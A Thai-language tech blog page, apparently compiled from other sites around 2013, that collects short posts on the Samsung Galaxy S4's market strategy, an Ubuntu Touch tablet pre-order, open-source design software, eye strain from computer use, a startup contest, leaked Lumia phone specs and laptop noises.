เมื่อเกือบหนึ่งปีก่อน ผมเขียนบทวิเคราะห์ Samsung Galaxy S III โดยใช้พาดหัวว่า เมื่อนวัตกรรมย้ายไปอยู่บนซอฟต์แวร์ ทิศทางนี้ยิ่งแจ่มชัดขึ้นใน Galaxy S4 ซึ่งประเด็นนี้จะกล่าวถึงต่อไปในหัวข้อเรื่องซอฟต์แวร์
ฟีเจอร์ด้านฮาร์ดแวร์อย่างเดียวที่ผมยังเห็นว่าพัฒนาต่อไปได้อีกพอสมควรคือ "กล้อง" ซึ่งในรอบ 1-2 ปีที่ผ่านมา เราเห็นตัวอย่างจาก Nokia 808 PureView และ Lumia 920 ว่าถ้าตั้งใจทำจริงๆ มันก็มีของเจ๋งๆ ออกมาให้ใช้กัน (ทั้ง iPhone 5 และ HTC One ก็พยายามบุกไปในทางนี้ด้วย เพียงแต่โนเกียทำได้เด่นกว่า) ในขณะที่ S4 แทบไม่มีนวัตกรรมเรื่องฮาร์ดแวร์กล้องเลย ถือเป็นประเด็นย่อยๆ ที่น่าผิดหวังอยู่บ้าง

ซอฟต์แวร์และบริการ

งานเปิดตัว S4 เต็มไปด้วยการโชว์ฟีเจอร์ด้านซอฟต์แวร์ที่หลากหลาย ท่ามกลางเสียงวิจารณ์ว่าบางอย่างไม่ใช่ของใหม่ (เช่น S Voice Drive หรือ S Translate) และบางอย่างอาจใช้ประโยชน์จริงไม่ได้ (เช่น Smart Scroll)
ถ้าลองวิเคราะห์กันดู แรงจูงใจของซัมซุงกับเรื่องซอฟต์แวร์มีหลายประการ ดังนี้
1) สร้างระบบของตัวเองที่ไม่พึ่งพากูเกิล
สำหรับบริษัทใหญ่ขนาดซัมซุงที่ขายมือถือหลักร้อยล้านเครื่องต่อปี การที่ไม่สามารถควบคุมระบบปฏิบัติการได้เองถือเป็นจุดอ่อนสำคัญ (ดูตัวอย่าง Lumia สิครับว่าผลเป็นอย่างไร) ซัมซุงใช้ยุทธศาสตร์สองขาแก้ปัญหานี้ โดยทางหนึ่งไปซุ่มทำระบบปฏิบัติการเองเผื่อไว้ (Bada/Tizen) และอีกทางหนึ่งก็พยายามลดอิทธิพลหรือการพึ่งพากูเกิลลง
ยุทธศาสตร์ขาที่สองของซัมซุงเหมือนกับที่อเมซอนทำกับ Kindle Fire นั่นคือ "ขอยืม" เพียงแค่ระบบปฏิบัติการและแพลตฟอร์มแอพจากกูเกิล แต่สร้างบริการต่อยอดที่เหลือทั้งหมดด้วยตัวเอง การที่ซัมซุงหรืออเมซอนทำร้านขายเนื้อหาหรือแอพนำทางเอง แทนที่จะต้องผูกตัวกับ Play Store หรือ Google Maps จึงไม่ใช่เรื่องน่าแปลกใจนัก และ S4 ก็แสดงให้เห็นทิศทางนี้ที่ชัดเจนมากๆ
Galaxy S4
2) สร้างประสบการณ์การใช้งานสำเร็จรูป
แอพหลายตัวที่ซัมซุงโชว์ในงานแถลงข่าว คนอื่นทำกันมาเยอะแล้ว หาดาวน์โหลดได้ทั่วไปตามช่องทางดาวน์โหลดแอพบนแพลตฟอร์มต่างๆ
แต่ผู้อ่าน Blognone น่าจะทราบกันดีว่า ผู้ใช้สมาร์ทโฟนอีกจำนวนมาก "ไม่สนใจโหลดแอพ" ต่อให้เป็นแอพฟรีก็ตาม เนื่องจากเวลาในการศึกษาและเรียนรู้แอพถือเป็นต้นทุนที่ต้องจ่าย
ซัมซุงจึงใช้แนวทางเดียวกับแอปเปิลนั่นคือ "ผนวก" แอพที่คิดว่าจำเป็นมาให้เลยเสร็จสรรพ เพื่อหวังว่าจะสร้างประสบการณ์ใช้งานแบบสำเร็จรูป ชนิดว่าซื้อเครื่องมาเปิดครั้งแรกแล้วใช้ได้ทันที (ซึ่งจะใช้ดีจริงหรือไม่ก็เป็นเรื่องที่ต้องถกกันต่อไป)
3) ซอฟต์แวร์มีส่วนช่วยต่อการตลาด
ฟีเจอร์หวือหวาบางตัวอย่าง Sound and Shot, Smart Scroll/Pause, Air View, Group Play อาจใช้งานไม่ได้จริง (ซึ่งต้องดูกันที่รีวิวละเอียดนะครับ) แต่ในแง่การตลาด การประชาสัมพันธ์ การนำไปโปรโมท มันมีพลังและช่วยสร้างความแตกต่างตอนโฆษณาได้มาก
อย่าลืมว่าซัมซุงเป็นบริษัทมือถือที่ใช้เม็ดเงินโฆษณามหาศาล (จน HTC ต้องออกมาบลัฟ ดังนั้นเมื่อซัมซุงพัฒนาซอฟต์แวร์หรือฟีเจอร์ต้องคำนึงถึง "ตอนขาย" นอกเหนือจาก "ตอนใช้" ด้วย (ยุทธศาสตร์นี้ดีหรือไม่ขึ้นกับว่า "ตอนใช้" มันเวิร์คจริงหรือเปล่า เพียงแต่มันอธิบายว่าซัมซุงคิดถึง "ตอนขาย" ควบคู่ไปด้วย)

การตลาดและตำแหน่งของผลิตภัณฑ์

นับถึงวันนี้ปี 2013 แบรนด์ของ "ซัมซุง" ในโลกสมาร์ทโฟนติดลมบนไปเรียบร้อยแล้ว ถึงแม้ใครจะไม่ชอบเป็นการส่วนตัว แต่ซัมซุงก็มียอดขายที่เป็นเบอร์หนึ่งของโลกติดต่อกันมาหลายไตรมาสเป็นหลักฐานพิสูจน์ตัวเอง
ยุทธศาสตร์การออกสินค้าของซัมซุงเน้นตลาดทุกระดับชั้น ตั้งแต่บนสุดยันล่างสุด โดยมีเป้าหมายเพียงหนึ่งเดียวคือ "ยอดขาย" เป็นสำคัญ
ซัมซุงต้องการทำยอดขายให้เยอะที่สุดเท่าที่เป็นไปได้ คำว่า "ยอดขายเยอะ" แปลว่าต้องขายตลาดแมส
การเปิดตัว Galaxy S4 ตอกย้ำทิศทางของซัมซุงว่าจะเน้นตลาดแมสต่อไป โดยวางตำแหน่งของผลิตภัณฑ์ให้เน้นฟีเจอร์ด้านไลฟ์สไตล์เป็นหลัก มาถึงวันนี้เราต้องยอมรับว่า Galaxy S4 (และซีรีส์ Galaxy S ในภายรวม) หลุดพ้นความเป็นมือถือ geek อย่างสมบูรณ์ กลายเป็นมือถือตลาดแมส (ที่ระดับราคาพรีเมียม) อย่างสมบูรณ์
กลุ่มผู้ใช้ระดับสูงที่เน้นนวัตกรรมไฮเทค อาจไม่สนใจฟีเจอร์ฝั่งซอฟต์แวร์ที่ S4 นำเสนอ แต่ด้วยแบรนด์และกลุ่มเป้าหมายทางการตลาด ผมยังคิดว่ากลุ่มผู้ใช้ที่ไม่สนใจเรื่องเทคนิคมากนัก ครอบครัว ผู้หญิง คนทำงาน (ตามที่นำเสนอในงานเปิดตัว) จะรู้สึกโดนใจกับฟีเจอร์ของ S4 เข้าสักอย่างจนได้
ในทางกลับกัน กลุ่มเป้าหมายที่ว่านี้ก็ไม่ได้สนใจกับความเร็วสัญญาณนาฬิกา จำนวนแรม หรือพิกเซลของกล้องเท่าไรนัก (แต่ถ้าสนใจบ้าง ซัมซุงก็ตอบโจทย์ได้ว่า "นี่ไง สเปกดีขึ้นกว่าเดิมทุกด้าน")
เมื่อซัมซุงให้ความสำคัญกับตลาดแมส (ที่มีจำนวนเยอะกว่าอย่างมีนัยสำคัญ) เป็นหลัก ผู้ใช้กลุ่ม geek หรือ power user อาจต้องมองหาตัวเลือกเป็นแบรนด์อื่นๆ แทน ฝั่งแอนดรอยด์ก็อาจเป็นโซนี่ แอลจี หรือไม่ก็ต้องมองไปถึง X Phone หรือ Nexus รุ่นถัดไปกันเลย
อย่างที่เขียนไปแล้วว่า S4 ไม่ใช่แค่ผลิตภัณฑ์ตัวเดียว แต่ต้องมองให้ครบทั้งวัฏจักร ถ้ายังจำกันได้ ซัมซุงเคยอธิบายว่าเหตุผลหนึ่งที่ใช้พลาสติกเพราะผลิตง่าย การประกาศวางขาย S4 ใน 155 ประเทศภายในเวลาไม่นานนัก ถือเป็นความสำเร็จด้านการผลิต-การขายที่หาคนมาต่อกรได้ยาก (แอปเปิลยังมีปัญหาเรื่องสินค้า iPhone 5 ในช่วงแรกๆ และตัวเปรียบเทียบที่ดีที่สุดคือ Nexus 4 ที่เต็มไปด้วยปัญหาเรื่องการผลิตมากมาย)
โดยส่วนตัวผมก็ค่อนข้างผิดหวังกับ S4 ที่ไม่ว้าวเท่าที่คาด แต่ก็เชื่อว่ามันน่าจะขายดีมากๆ ด้วยเหตุผลเรื่องสเปกที่ดูดี แบรนด์อันทรงพลัง ฟีเจอร์ที่ตรงกับกลุ่มเป้าหมาย การตลาดขั้นเทพ ปริมาณสินค้าเหลือเฟือ และช่องทางการจัดจำหน่ายที่ครอบคลุม ประสานและเชื่อมกันอย่างเต็มที่ ส่วนยอดขายจะ "เพิ่มเท่าตัว" จาก S III หรือไม่ (และถ้าไม่ถึงจะมองว่าเป็นความล้มเหลวหรือไม่) ก็เป็นเรื่องที่ต้องติดตามกันต่อไปยาวๆ
Galaxy S4

บุกอเมริกา

ประเด็นสุดท้ายที่ผมคิดว่าควรกล่าวถึงคือ การเลือกเปิดตัว S4 ที่อเมริกาเป็นครั้งแรก ซึ่งมีความสำคัญเชิงสัญลักษณ์ต่อสงครามมือถือระหว่างแอปเปิลกับซัมซุงเป็นอย่างมาก
ปัจจุบันนี้แอปเปิลเป็นผู้ผลิตสมาร์ทโฟนสัญชาติอเมริกันรายเดียวที่ยังแข็งแกร่ง (ส่วนโมโตโรลาต้องรอดูการกลับมากับ X Phone ต่อไป) ปัจจัยด้านอารยธรรมและความเป็นชาตินิยม ทำให้อเมริกายังเป็นฐานที่มั่นอันเข้มแข็งของแอปเปิลเสมอมา
ถึงแม้ซัมซุงจะชนะเบ็ดเสร็จในหลายๆ ประเทศ แต่ในอเมริกาก็ยังสู้แอปเปิลไม่ได้
ความสำคัญของอเมริกาคือเป็นตลาดอันดับหนึ่งในเชิงสัญลักษณ์ จุดกำเนิดสินค้าไฮเทคทั้งหมดเริ่มต้นที่นี่ ทิศทางของตลาดสมาร์ทโฟนถูกกำหนดโดยอเมริกา (ผู้ผลิตระบบปฏิบัติการสมาร์ทโฟน 3 รายใหญ่อยู่ในอเมริกาทั้งหมด)
ดังนั้นซัมซุงจึงต้องทำทุกทางที่จะโค่นแอปเปิลแล้วยึดอเมริกาให้จงได้ ที่ผ่านมาเราจึงเห็นโฆษณาของซัมซุงแซวคนต่อคิวหน้าร้านแอปเปิล ซึ่งเป็น "ภาพตัวแทนคนอเมริกัน" แบบหนึ่ง สิ่งที่ซัมซุงพยายามเสนอคือบอกคนอเมริกาว่า "ใช้ซัมซุงเจ๋งกว่า ใช้ซัมซุงเท่กว่า" ซึ่งก็ประสบความสำเร็จในระดับหนึ่ง
ผมคุยกับเพื่อนคนไทยที่อยู่ในอเมริกาก็ได้ข้อมูลว่า คนเริ่มมองว่า "แอปเปิลน่าเบื่อ/ซัมซุงน่าสนใจ" มากขึ้นเรื่อยๆ ส่วนคนขับรถตู้รับส่งระหว่างที่ผมมางานที่นิวยอร์ก (เป็นคนรัสเซียที่ย้ายมาอยู่อเมริกา) ก็เล่าว่าเขาใช้ iPhone มานาน 5 ปี เพิ่งเปลี่ยนมาเป็น S III และใช้ Google Maps ดูทางเวลาไปไหนมาไหน (แต่เขาก็ยอมรับว่าซัมซุงยังมีปัญหาบางจุดที่สู้แอปเปิลไม่ได้ในเรื่องประสบการณ์ใช้งาน)
การเลือกจัดงานเปิดตัว S4 ที่สหรัฐจึงไม่ใช่เรื่องบังเอิญ แต่เป็นส่วนหนึ่งของความตั้งใจที่จะบุกยึดอเมริกาให้ได้ ซึ่งผลจะเป็นอย่างไรก็ต้องรอดูต่อไปอีกสักระยะหนึ่งเช่นกัน
Galaxy S4

บทสรุป Galaxy S4

  • ฮาร์ดแวร์เริ่มเดินช้าลง เน้นที่ซอฟต์แวร์กับบริการแทน
  • มันเป็นมือถือตลาดแมสระดับพรีเมียม ดังนั้นกลุ่ม geek อาจต้องรอดู X Phone หรือ Nexus ตัวหน้า
  • เช่นเดียวกับที่สรุปไว้ใน บทวิเคราะห์ iPhone 5 ถ้าคิดจะอยู่ค่ายซัมซุง การซื้อ Galaxy S4 ถือเป็นตัวเลือกเดียวระดับตลาดบน เลขรุ่นเริ่มไม่สำคัญแบบเดียวกับฝั่งแอปเปิล มันเป็นการอัพเกรดตามรอบปีของค่ายเดิม
  • ซัมซุงต่างจากแอปเปิลที่ชูเรื่องนวัตกรรมเป็นหลัก เพราะซัมซุงยังมีเรื่องรุ่นของสินค้า ช่องทางจำหน่าย การตลาด ราคา ฯลฯ ให้พิจารณาร่วมอีกมาก


copy จาก blognone.com

Wednesday, March 13, 2013

Ubuntu Touch ตัวแรกของโลกเปิดให้จองแล้ว

Ubuntu Touch
Ubuntu Touch

หลังจากเปิดให้ได้โหลดไปเล่นกันได้ไม่นานสำหรับอุปกรณ์ Nexus วันนี้มีเว็บไซต์เปิดให้สั่งจอง Ubuntu Tablet กันแล้วครับ ภายใต้ชื่อ Intermatrix U7 ในราคา 275 USD โดยสเปกเป็นไปตามนี้




  • CPU: 1.5GHz Quad-Core Cortex A9;
  • GPU: Quad Core Vivante GC1000+;
  • RAM: 1 GB;
  • Flash storage: 16 GB;
  • Expansion slot: microSD Card Slot;
  • Display size: 7-inch IPS Capacitive Touchscreen @ 1280x800 (with a pixel density of ~275 PPI);
  • Camera: primary 2 MP, secondary 0.3 MP;
  • Connectivity: microUSB 2.0, HDMI 1.4, WLAN 802.11 b/g/n and 3.5 mm Audio Jack.
Tablet ตัวนี้ไม่ได้เป็นตัวที่ออกมาอย่างเป็นทางการจาก Canonical และยังไม่แน่ใจว่าเจ้าเว็บไซต์นี้น่าเชื่อถือสักแค่ไหน แต่ถ้ามันได้ออกมาเป็นของให้จับต้องได้จริง ยังไงแล้วมันก็ดีล่ะครับ
หน้าเว็บไซต์สำหรับสั่งจอง ที่ intermatrix.com.au
ที่มา: webupd8.org

11 ซอฟต์แวร์โอเพนซอร์ส สำหรับนักออกแบบ


สำหรับผู้ที่ทำงานด้านออกแบบ อาจจะคิดไม่ถึงว่าจะมีซอฟต์แวร์โอเพนซอร์สที่สามารถใช้ทดแทนงานที่ตนเองทำอยู่ได้ ซึ่งทาง smashingapps.com ได้หยิบเอามาให้ดูกันครับ ว่ามีซอฟต์แวร์โอเพรซอร์สอะไรบ้าง ที่สามารถใช้ทดแทนซอฟต์แวร์เชิงพานิชที่ใช้กันทั่วไปในฝั่งของงานออกแบบได้ ลองมาดูกันครับ ว่าทางเลือกของเรามีอะไรบ้าง
Jahshaka ทางเลือกสำหรับ Adobe After Effects

สำหรับงานตัดต่อวิดีโอโดยเฉพาะ พร้อมลูกเล่น Effect ต่างๆ พร้อมใช้งาน
CinePaint ทางเลือกสำหรับ Adobe Photoshop

เป็นซอฟต์แวร์ตกแต่งภาพที่ต่อยอดมาจาก GIMP รองรับภาพที่มีคุณภาพสูง เช่น DPX, 16-bit TIFF และ OpenEXR รวมถึงรองรับค่าสีได้ตั้งแต่ 8-bit, 16-bit ไปจนถึง 32-bit
Amaya ทางเลือกสำหรับ Adobe Dreamweaver

ซอฟต์แวร์ Web Editor ที่มีเครื่องมือต่างๆให้เลือกใช้มากมาย ใครเคยใช้ Dreamweaver อยู่ คงต้องลองตัวนี้ดูบ้างครับ (ผมก็ไม่เคย ไว้จะลองดู)
Open Office Draw ทางเลือกสำหรับ Microsoft Visio

โปรแกรมวาดไดอะแกรมอย่างง่าย ที่รวมไว้แล้วในชุด OpenOffice.org สามารถจัดหน้าหนังสืออย่างง่ายได้ด้วย รวมถึงไดอะแกรมที่วาดแล้ว สามารถนำไปใส่ในเอกสารของ Writer ได้อย่างไม่ยากเย็นนัก
Blender ทางเลือกสำหรับ Autodesk 3ds Max

ซอฟต์แวร์ตัวเล็กคุณภาพสูงตัวนี้ ที่จะช่วยคุณสร้างสรรค์ผลงานสามมิติให้เหมือนจริงได้ แม้ว่าการใช้งานอาจจะยากหรือไม่คุ้นเคยบ้าง แต่ก็ไม่ลำบากนักที่จะปรับตัว แถมผลงานที่ได้ก็ไม่ใช่จะด้อยกว่า 3ds Max เสียด้วย
Imgv ทางเลือกสำหรับ ACDSee

ซอฟต์แวร์ดูภาพที่ควบทุกความสามารถ เช่น เดียวกับซอฟต์แวร์ดูภาพอื่นๆ แต่โดดเด่นกว่าด้วยการที่สามารถรันได้บนหลายๆแพลทฟอร์ม ไม่ว่าจะเป็น Windows, Linux, BSD, OSX หรืออื่นๆ
Inkscape ทางเลือกสำหรับ Adobe Illustrator

ซอฟต์แวร์โอเพนซอร์สที่ใช้วาดภาพ Vector เช่นเดียวกับ Illustrator, CorelDraw หรือ Xara X จุดเด่นคือใช้มาตราฐาน W3C ในการจัดเก็บไฟล์ คือเป็นไฟล์ SVG นั่นเอง
Gimpshop ทางเลือกสำหรับ Adobe Photoshop

อีกหนึ่งซอฟต์แวร์ตกแต่งรูปภาพที่ต่อยอดจาก GIMP โดยที่ Gimpshop จะเหมือนกับ GIMP แทบจะทุกประการ ที่แตกต่างคือ การจัดเรียงเมนูและชื่อเรียกในเมนูต่างๆ ให้ใกล้เคียง Photoshop มากขึ้น ทำให้ผู้ใช้ที่มีพื้นฐานการใช้งาน Photoshop อยู่แล้ว สามารถใช้งานได้ง่ายขึ้น
Xara LX ทางเลือกสำหรับ CoralDRAW

อีกหนึ่งซอฟต์แวร์วาดภาพแบบ Vector ที่เคยเป็ยซอฟต์แวร์ Proprietary มาก่อน อีกทั้งยังเคยเป็นที่นิยมมากๆด้วย ปัจจุบันความสามารถจะพัฒนาไปเป็นอย่างไรแล้วนั้น คงต้องหามาลองเล่นกันดูครับ
Avidemux ทางเลือกสำหรับ Final Cut Pro

อีกหนึ่งซอฟต์แวร์ตัดต่อวิดีโอ รองรับการตัดต่อวิดีโอจากไฟล์ที่หลากหลาย กับหน้าจอที่ดูใช้งานง่ายมากๆ ซึ่งจะช่วยให้การเรียนรู้โปรแกรมเป็นไปได้ง่ายยิ่งขึ้น
Pencil ทางเลือกสำหรับ Toon Boom Studio

ใครจะรู้บ้างว่า ซอฟต์แวร์โอเพนซอร์สก็มีที่ใช้ในการสร้างการ์ตูนด้วย ใครชื่นชอบในการสร้างสรรค์ผลงานอนิเมชั่นไม่ควรพลาดกับโปรแกรมนี้ครับ
ทั้งหมดก็เป็นส่วนหนึ่งของซอฟต์แวร์โอเพนซอร์สในโลกของนักออกแบบ ยังคงมีซอฟต์แวร์โอเพนซอร์สอีกหลายตัวที่ไม่ได้หยิบมาแนะนำ ซึ่งอาจจะมีสักตัวที่เป็นตัวที่ถูกใจคุณ ยังไงก็ลองหามาเล่นกันดูครับ
ที่มา: ubuntuclub.com

ภัยอันตรายจากการใช้เครื่องคอมพิวเตอร์เป็นเวลานานๆ

การใช้เครื่องคอมพิวเตอร์
การใช้เครื่องคอมพิวเตอร์

กระทรวงสาธารณสุขเตือนคนไทยที่ใช้ เครื่องคอมพิวเตอร์นานๆ อาจเจอปัญหามากกว่า 3 เด้ง ทั้งโรคอ้วน ต้อหิน และหลุดโลก กระทรวงสาธารณสุขจึง แนะผู้ที่ใช้เครื่องคอมพิวเตอร์นานๆ ควรรักษาสายตา จัดเวลาพักสายตาบ้าง
ขณะนี้เครื่องคอมพิวเตอร์ ได้เข้ามามีอิทธิพลต่อชีวิตประจำวันของคนไทยมากยิ่งขึ้น ซึ่งการใช้เครื่องคอมพิวเตอร์นั้นทำให้คนไทยออกกำลังกายน้อยลง เนื่องจากเป็นการทำงานที่นั่งอยู่กับที่ เช่นเดียวกับในประเทศที่เจริญแล้วที่ใช้เครื่องคอมพิวเตอร์กันมาก กำลังมีปัญหาโรคอ้วน โดยอย่างยิ่งเด็ก เพราะขาดการออกกำลังกาย และทักษะในการเข้าสังคม ปัญหาที่พบบ่อยเมื่อต้องนั่งปฏิบัติงานอยู่หน้าจอ
เครื่องคอมพิวเตอร์นานๆ ก็คือ ปัญหาความล้าของสายตา สาเหตุเกิดจากการมองทั้งจอภาพ แป้นพิมพ์ และเอกสารสลับกันตลอดเวลา รวมทั้งระยะความห่างที่แตกต่างกันในการมองเห็นวัตถุทั้ง 3 ทำให้สายตาต้องปรับโฟกัสตลอดเวลา ก่อให้เกิดความล้าของสายตา นอกจากนี้การใช้สายตาเพ่งนาน ๆ ยังอาจทำให้ดวงตาแห้งเกิดระคายเคืองดวงตาได้
นอกจากนี้การใช้เครื่องคอมพิวเตอร์นานๆ อาจส่งปัญหาให้สายตาอื่นๆ ได้อีก โดยเมื่อเร็วๆ นี้มีงานศึกษาวิจัยในต่างประเทศพบว่า การใช้เครื่องคอมพิวเตอร์นานๆ โดยอย่างยิ่งในกลุ่มคนที่มีสายตาสั้นอยู่แล้ว จะมีความเสี่ยงสูงต่อการเป็นโรคต้อหินได้ ซึ่งโรคดังกล่าวจะทำลายจอประสาททำให้ดวงตาบอดได้ในที่สุด โดยพบได้ 3 ใน 10,000 คน ของกลุ่มที่ทำงานกับเครื่องคอมพิวเตอร์ ทั้งนี้ระบบประสาทดวงตาของคนที่สายตาสั้นจะมีความเครียดมากกว่าคนที่มีสายตา ปกติ ดังนั้นเรื่องความเครียดของสายตาจากการใช้เครื่องคอมพิวเตอร์ อาจกลายเป็นปัญหาในอนาคตอันใกล้นี้
เวลาขลุกอยู่กับเครื่องคอมพิวเตอร์นานๆ ไม่ว่าจะทำงาน เล่นเกมส์ หรือดูอินเตอร์เน็ต ควรนั่งให้ห่างจากจอภาพไม่น้อยกว่า 30 เซนติเมตร เพื่อลดปริมาณรังสีที่แผ่ออกมาให้ได้รับน้อยที่สุด จากการศึกษาของสำนักโรคจากการประกอบอาชีพและสิ่งแวดล้อม กรมควบคุมโรคพบว่า
การติดแผ่นกรองแสงหน้าจอเครื่องคอมพิวเตอร์ สามารถลดระดับปริมาณรังสีที่แผ่ออกมาจากจอภาพลงได้บ้าง แต่ไม่สามารถลดลงได้ทั้งหมด การติดหรือไม่ติดแผ่นกรองแสง จึงมีผลแตกต่างกันไม่มากนัก กับปริมาณรังสีที่แผ่ออกมาเพียงแต่การติดแผ่นกรองแสง จะช่วยให้ผู้ใช้เครื่องคอมพิวเตอร์ เกิดความสบายใจ หรือช่วยคลายความกังวล ลงได้บ้าง อย่างไรก็ดวงตาม แผ่นกรองแสง ก็ยังมีข้อดี ตรงที่ช่วยลดแสงจ้า แสงสะท้อน และไฟฟ้าสถิตย์ ช่วยให้ความล้าของสายตา ลดลง และป้องกันแสงสะท้อนเข้าสู่ดวงตาได้ระดับหนึ่ง
ดังนั้นจึงควรหันมารักษาและส่งเสริมสุขภาพสายตา โดยปรับระยะห่างระหว่างดวงตากับจอเครื่องคอมพิวเตอร์อย่างพอเหมาะให้สามารถอ่านหนังสือ ตัวเล็กที่สุดบนจอได้อย่างสบายๆ โดยที่ไม่ต้องเพ่ง ปรับความสว่างของจอเครื่องคอมพิวเตอร์ให้เหมาะกับดวงตา ให้รู้สึกไม่สว่างหรือมืดเกินไป และควรพักสายตาประมาณ 10 นาทีต่อชั่วโมง หรือพักทุก 15 นาที ต่อ 2 ชั่วโมง เช่น หลับดวงตา มองไปไกลๆ หรือดูสิ่งพิมพ์ตัวโตๆ ควรทำงานกับจอภาพไม่เกินวันละ ชั่วโมง

ประกวดไอเดียสร้างแอพมือถือ AIS The Startup Weekends 2013


ประวัติศาสตร์ของวงการไอทีที่ผ่านมาแสดงให้เห็นชัดเจนว่าโลกไอทีหมุนตาม startup เสมอ เราเห็นบริษัทอย่างเอชพี แอปเปิล ไมโครซอฟท์ กูเกิล ทวิตเตอร์ เฟซบุ๊ก โผล่ขึ้นมาจากโรงรถหรือห้องใต้ดินแล้วเปลี่ยนโลกในไม่กี่อึดใจ บริษัทหน้าใหม่เหล่านี้สร้างนวัตกรรมให้โลก ในขณะเดียวกันก็สร้างความมั่งคั่งให้กับผู้ก่อตั้ง พนักงาน และนักลงทุน
นี่จึงไม่น่าแปลกใจนักว่าทำไมกระแส startup ถึงมาแรงทั้งในตลาดโลกและตลาดบ้านเรา เพราะมันเป็นการลงทุนที่สร้างคน สร้างเทคโนโลยี และสร้างธุรกิจไปพร้อมๆ กัน
ช่วงหลังๆ ในประเทศไทยเองก็มีโครงการสนับสนุน startup เกิดขึ้นมากมาย ซึ่งยักษ์ใหญ่รายล่าสุดที่เข้ามาร่วมวงการคือโอเปอเรเตอร์หมายเลขหนึ่งของไทยอย่าง AIS กับโครงการ AIS The Startup
ที่มา blognone

Friday, February 22, 2013

Lumia 520/720


ข่าวลือข่าวหลุด ได้ปล่อยภาพ Lumia 520 และ Lumia 720 จากภาพ เป็นไปได้ที่ Lumia 520 จะไม่มีไฟแฟลชของกล้องมาให้ ส่วน Lumia 720 นั้นจะใช้เลนส์ Carl Zeiss และมีไฟแฟลชมาให้ นอกจากนั้นทั้งสองรุ่นมีหลากสีให้เลือกเช่นเคย แต่ดูไม่ออกว่าผู้ใช้จะถอดเปลี่ยนฝาหลังได้หรือไม่
จากข่าวลือก่อนหน้านี้ Lumia 720 จะมีหน้าจอ 4.3 นิ้ว, ซีพียูดูอัลคอร์ 1 กิกะเฮิรตซ์, แรม 512 เมกะไบต์ หน่วยความจำภายใน 8 กิกะไบต์ มีช่องใส่ microSD, กล้องหลัก 6 ล้านพิกเซล และกล้องหน้า 2 ล้านพิกเซล ส่วน Lumia 520 จะมีหน้าจอ 4 นิ้ว, ซีพียูดูอัลคอร์ 1 กิกะเฮิรตซ์, แรม 512 เมกะไบต์ หน่วยความจำภายใน 8 กิกะไบต์ มีช่องใส่ microSD, กล้องหลัก 5 ล้านพิกเซล ไม่มีกล้องหน้า
ที่มา: @evleaks (1,2) ผ่าน The Verge

Lumia 520
Lumia 720

เสียงแปลกๆ ในโน้ตบุ๊ก


ท่านที่ใช้งานโน้ตบุ๊กก็มักจะได้ยินเสียงแปลกๆ จากโน้ตบุ๊กของท่านกันบ้างละครับ แต่เสียงที่ดังขึ้นมานั้นมีจากทั้งเสียงปรกติ และเสียงที่ไม่ปรกติ ซึ่งเสียงที่ออกมาก็แตกตต่างกันไปตามแหล่งกำเนิดเสียง ซึ่งเราไปทำความรู้จักกันสักหน่อยครับว่าเสียงไหนปรกติ และเสียงไหนเป็นปัญหา
ปรกติ
image
  • เสียงจากลำโพง – อันนี้ถ้าไม่ดังสิครับเรียกว่าผิดปรกติ เสียงจากลำโพงก็จะดังขึ้นมาเป็นปรกติอยู่แล้วเวลาเราเปิดเพลง เปิดภาพยนตร์ แต่ถ้าเวลาไม่ได้เปิดเสียงอะไรแล้วดังนี่ให้สงสัยไปก่อนว่าลำโพงมีปัญหา หรืออาจจะมีปัญหาเรื่องกำลังไฟ เช่นไฟเกินนะครับ
  • พัดลมระบายความร้อน – หลักการของพัดลมคือหมุนใบพัดเพื่อช่วยในการระบายความร้อน ยิ่งเครื่องร้อนก็ยิ่งหมุนเร็ว เสียงก็จะดังเป็นธรรมดานะครับตรงนี้ไม่ต้องตกใจ แต่ถ้าเมื่อใดพัดลมไม่หมุนหรือไม่มีเสียงเลยให้เข้าศูนย์เลยนะครับเพราะ พัดลมไม่หมุนเครื่องอาจจะพังแทนได้
  • ฮาร์ดดิสค์ – อุปกรณ์นี้แม้ปรกติไม่ควรจะเกิดเสียเท่าไร แต่ถ้าทำงานหนักๆจะมีเสียงบ้างก็เป็นธรรมดา เพราะภายใน ฮาร์ดดิสค์คือจานเก็บข้อมูลที่หมุนอยู่ตลอดเวลา ยิ่งอ่านเขียนข้อมูลมากๆก็ยิ่งหมุนเร็ว จะมีเสียงบ้างก็เป็นธรรมดา แต่ถ้าดังเกินไป หรือดังๆ หยุดๆแบบแปลกๆคงต้องรีบเคลมแล้วละครับ
  • DVD Drive – หลักการเหมือนฮาร์ดดิสค์ เวลาอ่านแผ่นใหม่ๆ Drive จะหมุนเร็วมากทำให้เกิดเสียงดังพอสมควร แต่ถ้าไม่ได้อ่านแผ่นหรือเอาแผ่นออกไปแล้วก็จะเงียบไปเอง
อุปกรณ์ 4 ตัวในโน้ตบุ๊กที่จะมีเสียงดังบ้างก็ไม่แปลก ซึ่งถ้าเป็นเสียงจากพวกนี้กไม่ต้องตกใจนะครับเป็นปรกติ แต่ถ้าเสียงที่ดังออกมาแปลกออกไปละ ซึ่งมันคงไม่ปรกติแล้ว
ไม่ปรกติ
image
  • เสียงดัง จี๊ดๆ เหมือนไฟฟ้าจ่ายเกิน หรือจ่ายไม่สม่ำเสมอ อาจจะมีปัญหาเรื่องภาคจ่ายไฟ
  • เสียงฮาร์ดดิสค์ที่ดังแบบกระตุก หรือดังมากแต่อ่านเปิดไฟล์ในฮาร์ดดิสค์ดิสค์ไม่ได้หรือช้ามาก เคลมฮาร์ดดิสค์เลย
  • ลำโพงเสียงแตก ซึ่งมักจะเกิดขึ้นเมื่อเปิดดังมากๆ ถ้าเป็นเครื่องใหม่ๆ แนะนำเคลมก่อนเลยครับ
  • เสียงกรอบ แกร๊บตามรอยต่อของ Body ซึ่งแสดงถึงว่า Body ประกอบไม่สนอท หรือเกิดการแตกหัก ถ้าเคลมได้เคลมนะครับ ถ้าเคลมไม่ได้ก็ระวังตรงนี้หน่อย
image
หลักๆ ถ้าเสียงที่ดังออกมาจากตัวเครื่องไม่ใช่เสียงที่ปรกติเราเจอกันทุกวันเช่น เสียงไฟฟ้าดังจี๊ดๆ ในเครื่อง หรือเสียงอื่นๆ ที่หาสาเหตุไม่ได้แนะนำเข้าศูนย์เคลมก่อนนะครับใหม่ๆ อาจจะ ซ่อมได้ทัน ถ้าทิ้งไว้นานๆ อาจจะส่งผลต่อแผงวงจรหรืออุปกรณ์อื่นๆ ในระยะยาวได้

Acer ขอแนะนำ Chromebook C7 ตัวใหม่


